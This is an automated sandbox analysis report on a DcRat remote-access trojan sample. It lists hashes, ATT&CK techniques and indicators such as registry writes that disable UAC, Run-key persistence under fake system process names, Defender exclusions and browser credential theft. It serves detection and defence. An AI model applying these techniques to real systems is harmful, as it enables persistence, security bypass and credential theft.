dcrat | da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27/03/2025, 11:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Size

3.0MB
MD5

4bc701fc5e13c1287646e5d1f79760d4
SHA1

6bc6e4c44012084ec5af5ebdfd09314e598464e1
SHA256

da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb
SHA512

fd3bf97de8840b16ae72295082e6aff5f0833de8791d39dc6a347cab771af1b88cfcc56c307c663112d2207cf2a0059a0882b053aa8fa0b67a1f3a3a183ee503
SSDEEP

49152:S/3iuoi0xrLIy5sx+3K0n+B87/2bHJC3H0oJK7rohky64a65KKRD:ASuMxAxKp+SDqHJq+zy86A

Score

10^/10

dcrat defense_evasion discovery execution infostealer persistence rat spyware stealer trojan

Malware Config

Signatures

DcRat 50 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		2024	schtasks.exe
		2392	schtasks.exe
		2400	schtasks.exe
		1656	schtasks.exe
		2712	schtasks.exe
		2220	schtasks.exe
		304	schtasks.exe
		2560	schtasks.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA		da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
		2656	schtasks.exe
		2996	schtasks.exe
		1564	schtasks.exe
		2624	schtasks.exe
		1344	schtasks.exe
		1676	schtasks.exe
		704	schtasks.exe
		1988	schtasks.exe
		2844	schtasks.exe
		292	schtasks.exe
		2356	schtasks.exe
		3036	schtasks.exe
		1664	schtasks.exe
		2512	schtasks.exe
		2332	schtasks.exe
		1336	schtasks.exe
		1188	schtasks.exe
		1520	schtasks.exe
File created	C:\Program Files\Windows Portable Devices\6ccacd8608530f		da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
		2752	schtasks.exe
		3012	schtasks.exe
		284	schtasks.exe
		752	schtasks.exe
		2876	schtasks.exe
		1364	schtasks.exe
		2436	schtasks.exe
		2556	schtasks.exe
		2016	schtasks.exe
		2000	schtasks.exe
		2984	schtasks.exe
		2028	schtasks.exe
		2328	schtasks.exe
		1760	schtasks.exe
		2228	schtasks.exe
		1408	schtasks.exe
		2384	schtasks.exe
		3000	schtasks.exe
		1324	schtasks.exe
		2336	schtasks.exe
		2524	schtasks.exe
		444	schtasks.exe

Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 16 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2560	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2336	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2556	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2996	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1664	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1564	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2024	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2512	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	704	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2016	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1988	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2000	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2332	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1336	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	284	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	752	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2524	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1408	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2984	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2624	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2392	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2876	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1188	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	444	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2384	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2400	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1656	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2844	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3000	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1520	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2712	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1344	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1676	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2220	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2328	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1760	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2436	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	292	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2228	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	304	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1324	2652	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	2652	schtasks.exe	31

UAC bypass 3 TTPs 6 IoCs

defense_evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/2484-1-0x0000000001380000-0x000000000168E000-memory.dmp	dcrat
behavioral1/files/0x00060000000173f1-40.dat	dcrat
behavioral1/files/0x000800000001662e-113.dat	dcrat
behavioral1/files/0x00070000000173f1-135.dat	dcrat
behavioral1/files/0x0015000000018663-180.dat	dcrat
behavioral1/memory/2676-349-0x0000000000E30000-0x000000000113E000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2392	powershell.exe
2924	powershell.exe
2452	powershell.exe
3016	powershell.exe
1668	powershell.exe
2972	powershell.exe
2120	powershell.exe
2164	powershell.exe
552	powershell.exe
668	powershell.exe
2012	powershell.exe
2256	powershell.exe
2024	powershell.exe
2960	powershell.exe
888	powershell.exe
2124	powershell.exe
704	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2676	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default User\\csrss.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\Program Files\\Windows Portable Devices\\OSPPSVC.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\Idle.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\taskhost.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb = "\"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Internet Explorer\\es-ES\\sppsvc.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Windows Portable Devices\\Idle.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb = "\"C:\\Users\\Public\\Videos\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Windows Media Player\\fr-FR\\spoolsv.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\wininit.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Program Files\\Windows Media Player\\fr-FR\\spoolsv.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Windows Portable Devices\\Idle.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OSPPSVC = "\"C:\\Users\\All Users\\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\\OSPPSVC.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb = "\"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsm = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\lsm.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\tracing\\dllhost.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Windows\\tracing\\dllhost.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\All Users\\Favorites\\lsass.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\Idle.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Internet Explorer\\es-ES\\sppsvc.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Recovery\\1f4ba082-69f6-11ef-a143-62cb582c238c\\wininit.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Users\\Default User\\csrss.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Program Files\\Mozilla Firefox\\gmp-clearkey\\csrss.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\All Users\\Favorites\\lsass.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb = "\"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe\""	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 4 IoCs

defense_evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe

Drops file in Program Files directory 40 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Portable Devices\RCXEDAB.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\RCXEFB0.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\RCXEFB1.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\RCXF1B6.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCXFBAC.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCXFBAD.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Windows Portable Devices\6ccacd8608530f	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\101b941d020240	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\lsm.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Internet Explorer\es-ES\RCXB82.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Windows Media Player\fr-FR\RCXFCA.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\93903936fbff84	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX910.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\b75386f1303e64	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\csrss.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Internet Explorer\es-ES\0a1fd5f707cd16	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Mozilla Firefox\gmp-clearkey\csrss.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Windows Media Player\fr-FR\RCXFCB.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Windows Media Player\fr-FR\spoolsv.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhost.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Internet Explorer\es-ES\sppsvc.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Windows Media Player\fr-FR\spoolsv.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Mozilla Firefox\gmp-clearkey\886983d96e3d3e	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Windows Portable Devices\Idle.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\taskhost.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Windows Portable Devices\OSPPSVC.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Mozilla Firefox\gmp-clearkey\RCX22.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\RCX911.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files (x86)\Reference Assemblies\Microsoft\RCXF1B5.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Internet Explorer\es-ES\RCXB83.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Windows Portable Devices\Idle.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files (x86)\Reference Assemblies\Microsoft\lsm.exe	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File created	C:\Program Files\Windows Portable Devices\1610b97d3ab4a7	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCXEDAC.tmp	da479ac3683eb1b6cc8cee9967b33d7a299fb551b9a8a1ddd5182469de37b2fb.exe
